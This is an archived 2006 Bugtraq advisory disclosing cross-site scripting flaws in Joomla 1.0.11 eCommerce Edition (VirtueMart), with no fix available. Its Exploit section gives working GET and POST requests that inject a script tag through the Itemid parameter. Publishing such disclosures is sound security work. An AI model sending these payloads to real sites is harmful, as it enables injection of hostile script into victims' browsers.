VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities
From: Base64 <base640@xxxxxxxxx>
Date: Wed, 27 Sep 2006 01:11:04 -0700
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=d6zRf8yIHgESfkOLhHf7MUd8R264aONe1bLvvm7VbFYwZaHAhFlbvfuQoXhmJ4vsLsS2ssfKenPZYVw3z/usq/nvCwQGtNQRN4Q+UQyfIwTmrBHzCe6ZwbKhAMgZk2myJk1cXtsXV7JGKS8VQE723XbH4qu9fGOXYqHWko8Mnk8=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities


Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low


Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro

Prev by Date: Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit
Next by Date: Exploit module available for WebViewFolderIcon setSlice 0-day
Previous by thread: Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit
Next by thread: Exploit module available for WebViewFolderIcon setSlice 0-day
Index(es):
- Date
- Thread